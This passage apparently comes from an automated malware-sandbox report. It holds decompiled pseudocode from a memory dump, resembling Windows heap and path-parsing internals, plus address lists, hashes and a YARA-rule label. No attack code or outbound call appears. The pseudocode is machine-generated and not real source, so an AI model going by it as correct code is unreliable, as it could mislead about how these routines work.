													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01616DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0161F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0161F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0161F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0161FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0161FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0161F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0161F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E016A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0162D130(_t427, _t494, _t511);
				}
			}

0x016a5ba5
0x016a5baa
0x016a5baf
0x016a5bb4
0x016a5bb6
0x016a5bbc
0x016a5bbe
0x016a5bc4
0x016a5bcd
0x016a5bd3
0x016a5bd6
0x016a5bdc
0x016a5be0
0x016a5be3
0x016a5beb
0x016a5bf2
0x016a5bf8
0x016a5bfe
0x016a5c04
0x016a5c0e
0x016a5c18
0x016a5c1f
0x016a5c25
0x016a5c2a
0x016a5c2c
0x016a5c32
0x016a5c3a
0x016a5c3f
0x016a5c42
0x016a5c48
0x016a5c5b
0x016a5c5b
0x016a5c2c
0x016a5cb7
0x016a5cb9
0x016a5cbf
0x016a5cc2
0x016a5cca
0x016a5ccb
0x016a5ccb
0x016a5cd1
0x016a5cd7
0x016a5cda
0x016a5ce1
0x016a5ce4
0x016a5ce7
0x016a5ced
0x016a5cf3
0x016a5cf9
0x016a5cff
0x016a5d08
0x016a5d0a
0x016a5d0e
0x016a5d10
0x00000000
0x00000000
0x016a5d16
0x016a5d1a
0x00000000
0x00000000
0x016a5d20
0x016a5d22
0x016a5d25
0x016a5d2f
0x016a5d2f
0x016a5d33
0x016a5d3d
0x016a5d49
0x016a5d4b
0x00000000
0x00000000
0x016a5d5a
0x016a5d5d
0x016a5d60
0x00000000
0x00000000
0x016a5d66
0x016a5d69
0x00000000
0x00000000
0x016a5d6f
0x016a5d6f
0x016a5d73
0x016a5d79
0x016a5d7f
0x016a5d86
0x016a5d95
0x016a5d98
0x016a5dba
0x016a5dcb
0x016a5dce
0x016a5dd3
0x016a5dd6
0x016a5dd8
0x016a5de6
0x016a5dec
0x016a5dee
0x016a5df1
0x016a5df3
0x016a635a
0x016a635a
0x00000000
0x016a635a
0x016a5dfe
0x016a5e02
0x016a5e05
0x016a5e07
0x016a5e10
0x016a5e13
0x016a5e1b
0x016a5e1c
0x016a5e21
0x016a5e22
0x016a5e23
0x016a5e25
0x016a5e2a
0x016a5e2c
0x016a5e2e
0x016a5e36
0x016a5e39
0x016a5e42
0x016a5e47
0x016a5e4d
0x016a5e54
0x016a5e54
0x016a5e54
0x016a5e2e
0x016a5e5c
0x016a5e5f
0x016a5e62
0x016a5e64
0x016a5e6b
0x016a5e70
0x016a5e7a
0x016a5e7a
0x016a5e7a
0x016a5e6b
0x016a5e7e
0x016a5e7f
0x016a5e7f
0x016a5e81
0x016a5e87
0x016a5e8b
0x016a5e8c
0x016a5e8c
0x016a5e8c
0x016a5e9a
0x016a5e9c
0x016a5ea2
0x016a5ea6
0x016a5f50
0x016a5f50
0x016a5f57
0x016a5f66
0x016a5f66
0x016a5f66
0x016a5f68
0x016a5f6a
0x016a63d0
0x00000000
0x016a5f70
0x016a5f70
0x016a5f91
0x016a5f9c
0x016a5f9e
0x016a5fa4
0x016a5fa6
0x016a638c
0x016a6392
0x016a63a1
0x016a63a7
0x016a63af
0x016a63af
0x016a63bd
0x016a63d8
0x00000000
0x016a63d8
0x016a5fac
0x016a5fb2
0x016a5fb4
0x016a5fbd
0x016a5fc6
0x016a5fce
0x016a5fd4
0x016a5fdc
0x016a5fec
0x016a5fed
0x016a5fee
0x016a5fef
0x016a5ff9
0x016a5ffa
0x016a5ffb
0x016a5ffc
0x016a6000
0x016a6004
0x016a6012
0x016a6012
0x016a6018
0x016a6019
0x016a601a
0x016a601b
0x016a601c
0x016a6020
0x016a6059
0x016a605c
0x016a6061
0x016a6061
0x016a6022
0x016a6022
0x016a6022
0x016a6025
0x016a602a
0x016a602b
0x016a6031
0x016a6037
0x016a6038
0x016a603e
0x016a6048
0x016a6049
0x016a604a
0x016a604b
0x016a604c
0x016a604d
0x016a6053
0x016a6054
0x016a6054
0x016a6062
0x016a6065
0x016a6067
0x016a606a
0x016a6070
0x016a6075
0x016a6076
0x016a6081
0x016a6087
0x016a6095
0x016a6099
0x016a609e
0x016a60a4
0x016a60ae
0x016a60b0
0x016a60b3
0x016a60b6
0x016a60b8
0x016a60ba
0x016a60ba
0x016a60ba
0x016a60ba
0x016a60be
0x016a60c0
0x016a60c5
0x016a60c5
0x016a60c5
0x016a60c6
0x016a60cd
0x016a6114
0x016a60cf
0x016a60cf
0x016a60d4
0x016a60d5
0x016a60da
0x016a60db
0x016a60e1
0x016a60e2
0x016a60e8
0x016a60f8
0x016a60fd
0x016a60fe
0x016a6102
0x016a6104
0x016a6107
0x016a6109
0x016a610b
0x016a610b
0x016a610b
0x016a610b
0x016a610f
0x016a610f
0x016a6117
0x016a611a
0x016a611f
0x016a6125
0x016a6134
0x016a6139
0x016a613f
0x016a6146
0x016a6148
0x016a614b
0x016a614d
0x016a614f
0x016a614f
0x016a614f
0x016a614f
0x016a6153
0x016a6159
0x016a6159
0x016a615c
0x016a6163
0x016a6169
0x016a616c
0x016a6172
0x016a6181
0x016a6186
0x016a6187
0x016a618b
0x016a6191
0x016a6195
0x016a61a3
0x016a61bb
0x016a61c0
0x016a61c3
0x016a61cc
0x016a61d0
0x016a61dc
0x016a61de
0x016a61e1
0x016a61e4
0x016a61e6
0x016a61e8
0x016a61e8
0x016a61e8
0x016a61e8
0x016a61e6
0x016a61ec
0x016a61f3
0x016a6203
0x016a6209
0x016a620a
0x016a6216
0x016a621d
0x016a6227
0x016a6241
0x016a6246
0x016a624c
0x016a6257
0x016a6259
0x016a625c
0x016a625e
0x016a6260
0x016a6260
0x016a6260
0x016a6260
0x016a625e
0x016a6264
0x016a6267
0x016a6269
0x016a6315
0x016a6315
0x016a631b
0x016a631e
0x016a6324
0x016a6327
0x016a632f
0x016a6330
0x016a6333
0x016a633a
0x016a633c
0x016a6335
0x016a6335
0x016a6335
0x016a633f
0x016a6342
0x016a634c
0x016a6352
0x016a6355
0x016a6355
0x016a6359
0x00000000
0x016a626f
0x016a6275
0x016a6275
0x016a6278
0x016a627e
0x016a627e
0x016a6281
0x016a6287
0x016a628d
0x016a6298
0x016a629c
0x016a62a2
0x016a629e
0x016a629e
0x016a629e
0x016a62a7
0x016a62a7
0x016a62aa
0x016a62b0
0x016a62f0
0x016a62f0
0x016a62f2
0x016a62f8
0x016a62fd
0x016a62b2
0x016a62b2
0x016a62b2
0x016a62b5
0x016a62dd
0x016a62e2
0x016a62e5
0x016a62b7
0x016a62b8
0x016a62bb
0x016a62bd
0x016a62c0
0x016a62c4
0x016a62cd
0x016a62cd
0x016a62c0
0x016a62bb
0x016a62b5
0x016a6302
0x016a6303
0x016a6305
0x016a6305
0x016a6305
0x016a630c
0x016a630c
0x00000000
0x016a627e
0x016a6269
0x016a5eac
0x016a5ebb
0x016a5ebe
0x016a5ecb
0x016a5ecb
0x016a5ece
0x016a5ece
0x016a5ed4
0x016a5ed7
0x016a5ed9
0x016a5edb
0x016a5edb
0x016a5ee1
0x016a5ee1
0x016a5ee3
0x016a5f20
0x016a5f20
0x016a5ee5
0x016a5ee5
0x016a5ee5
0x016a5ee8
0x016a5f11
0x016a5f18
0x016a5eea
0x016a5eea
0x016a5eed
0x016a5ef2
0x016a5ef8
0x016a5efb
0x016a5f0a
0x016a5f0a
0x016a5eed
0x016a5ee8
0x016a5f22
0x016a5f28
0x00000000
0x00000000
0x016a5f30
0x016a5f31
0x016a5f37
0x016a5f3a
0x016a5f3d
0x016a5f44
0x00000000
0x00000000
0x00000000
0x016a5f46
0x016a5f48
0x016a5f4d
0x00000000
0x016a5f4d
0x016a5dda
0x016a5ddf
0x00000000
0x016a5ddf
0x016a5dd8
0x016a5da7
0x016a5da9
0x016a5dac
0x016a5dae
0x00000000
0x016a5db4
0x016a5db4
0x00000000
0x016a5db4
0x016a5dae
0x016a5d88
0x016a5d8d
0x016a6363
0x016a6369
0x016a636a
0x016a6370
0x016a6372
0x016a637a
0x016a637b
0x016a637d
0x00000000
0x00000000
0x016a637f
0x016a6385
0x00000000
0x016a6385
0x016a5d38
0x016a5d3b
0x00000000
0x00000000
0x00000000
0x016a5d3b
0x016a5d27
0x016a5d29
0x00000000
0x00000000
0x00000000
0x016a6360
0x00000000
0x016a6360
0x016a5c10
0x016a5c10
0x016a63da
0x016a63e5
0x016a63e5

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f680a69e90962dfc94f69caf39ec962529e855d3fd60e26dbff8e477185078
Instruction ID: c8e7a576375bb53c8c04cab4262102067267cd9eeabfb728b2d8cc7fec885ac4
Opcode Fuzzy Hash: f0f680a69e90962dfc94f69caf39ec962529e855d3fd60e26dbff8e477185078
Instruction Fuzzy Hash: 0C423875A002298FDB24CF68CC80BA9BBB1FF45304F5981AAD94DAB342D774AD85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 015F4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E015F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x16cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0160F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E015F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L015F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E015F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M015F45F8))) {
												case 0:
													_v568 = 0x15b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x15b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L015F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0161F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0161F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
